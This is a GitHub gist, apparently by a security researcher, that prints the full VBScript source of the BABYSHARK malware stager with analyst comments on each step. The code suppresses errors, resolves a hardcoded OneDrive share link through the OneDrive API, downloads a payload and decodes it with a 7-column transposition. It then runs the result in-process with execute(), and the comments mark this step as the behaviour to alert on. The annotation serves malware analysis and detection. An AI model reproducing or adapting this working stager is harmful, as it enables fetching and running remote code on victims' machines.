@JohnHammond
Created February 23, 2022 22:42
BABYSHARK malware stager
' BABYSHARK stager, top-level flow: parse a OneDrive share URL into its API parameters,
' resolve the item to a direct download URL, fetch the payload, undo a 7-column
' transposition (Co00) and hand the result to execute.
' Observable behaviour for detection: two synchronous GETs through msxml2.xmlhttp
' (api.onedrive.com, then a 1drv.com download URL) followed by execute() of the
' second response text in the script host process.
' Every runtime error is suppressed; later statements keep running on a failure.
On Error Resume Next
' Seed share URL. The authkey, cid and id query parameters are extracted from it below.
Request_0 = "https://onedrive.live.com/?authkey=%21AL1nlnPI22OktF8&cid=FF254DB40FA2A3BA&id=FF254DB40FA2A3BA%21113&parId=root&o=OneUp"
' Single HTTP client object reused for both requests.
Set Post0 = CreateObject("msxml2.xmlhttp")
' File system object; only referenced by FileWrite, which nothing in this script calls.
Set fs = CreateObject("Scripting.FileSystemObject")
' Writes content to filename, overwriting an existing file (second CreateTextFile
' argument True). Uses the script-level fs object. No return value is assigned.
' Not called anywhere in this script; presumably left over from another variant of the stager.
Function FileWrite(filename, content)
Set hnd = fs.CreateTextFile(filename, True)
hnd.Write content
hnd.Close
End Function
' Payload decoder: undoes a columnar transposition with d=7 columns.
' c is treated as consecutive rows of 7 characters and emitted column by column;
' the trailing L mod 7 characters (an incomplete last row) are appended unchanged.
' Returns the rearranged string; an empty c yields "".
Function Co00(c)
d=7
L=Len(c)
s=""
' Outer loop fixes the column jx, inner loop walks every complete row ix.
For jx=0 To d-1
For ix=0 To Int(L/d)-1
' Mid is 1-based, so this is the character at row ix, column jx.
s=s&Mid(c,ix*d+jx+1,1)
Next
Next
' Characters that did not fill a complete row are passed through as-is.
s=s&Right(c,L-Int(L/d)*d)
Co00=s
End Function
' Regex helper: returns the patternorder-th (0-based) match of pattern in vbs_data.
' On no match it sets the script-level act_flag to 0 and returns Empty; act_flag is
' not read anywhere in this script. submatchorder is accepted but never used.
' IgnoreCase is left at its default, so matching is case-sensitive.
Function my_preg_match(vbs_data, pattern, patternorder, submatchorder)
Set re = New RegExp
re.Pattern = pattern
re.Global = True
' Test returns a Boolean; comparing with 0 checks for False (no match).
If re.Test(vbs_data) = 0 Then
act_flag = 0
Exit Function
End if
Set oMatches = re.Execute(vbs_data)
Set oMatch = oMatches(patternorder)
' Assigned without Set, so callers presumably receive the match's default
' property (the matched text) rather than the Match object — NOTE(review): confirm.
my_preg_match = oMatch
End Function
' Step 1: pull the share parameters out of the seed URL.
pattn = "authkey=[a-zA-Z0-9%_-]+"
authkey = my_preg_match(Request_0, pattn, 0, 0)
' Hand-rolled percent-decoding for the three escapes an authkey may contain.
authkey = Replace(authkey, "%21", "!")
authkey = Replace(authkey, "%5F", "_")
authkey = Replace(authkey, "%2D", "-")
pattn = "cid=[a-zA-Z0-9%_-]+"
cid = my_preg_match(Request_0, pattn, 0, 0)
' The leading "&" keeps this from matching the "id=" inside "cid="; it is stripped next.
pattn = "&(id=[a-zA-Z0-9%_-]+)"
id = my_preg_match(Request_0, pattn, 0, 0)
id = Replace(id, "&", "")
id = Replace(id, "%21", "!")
' Drop the parameter names, leaving the drive id and item id.
path1 = Replace(cid, "cid=", "")
path2 = Replace(id, "id=", "")
' Step 2: OneDrive API item lookup, selecting only id and @content.downloadUrl.
' "+" is used for concatenation here while the rest of the script uses "&".
Request_1 = "https://api.onedrive.com/v1.0/drives/" + path1 + "/items/" + path2 + "?select=id%2C%40content.downloadUrl&" + authkey
Post0.open "GET", Request_1, False
' setRequestHeader takes two arguments; the third is surplus, so under
' On Error Resume Next this call presumably errors silently and sets no header — confirm.
Post0.setRequestHeader "Content-Type", "application/json", "odata.metadata=none"
Post0.Send
Response_1 = Post0.responseText
' Extract the 1drv.com download URL from the JSON reply. VBScript strings have no
' backslash escapes, so each "\\" below is a regex-escaped literal backslash: as written
' the pattern expects ":" and "/" in the URL to be backslash-escaped in the reply —
' NOTE(review): verify against a captured response.
pattn = "downloadUrl.*https*\\:\\/\\/.*.1drv\\.com\\/[a-zA-Z0-9_-]+"
Request_2 = my_preg_match(Response_1, pattn, 0, 0)
' Drop the first 14 characters of the match; downloadUrl":" is 14 characters long.
Request_2 = Mid(Request_2, 15, Len(Request_2) - 15 + 1)
' Step 3: fetch the transposed payload.
Post0.open "GET", Request_2, False
Post0.setRequestHeader "Content-Type", "text/plain"
Post0.Send
Response_2 = Post0.responseText
' Undo the 7-column transposition and run the result as VBScript in this process;
' the execute() of downloaded text is the key behaviour to alert on.
PlainCmdline = Co00(Response_2)
execute(PlainCmdline)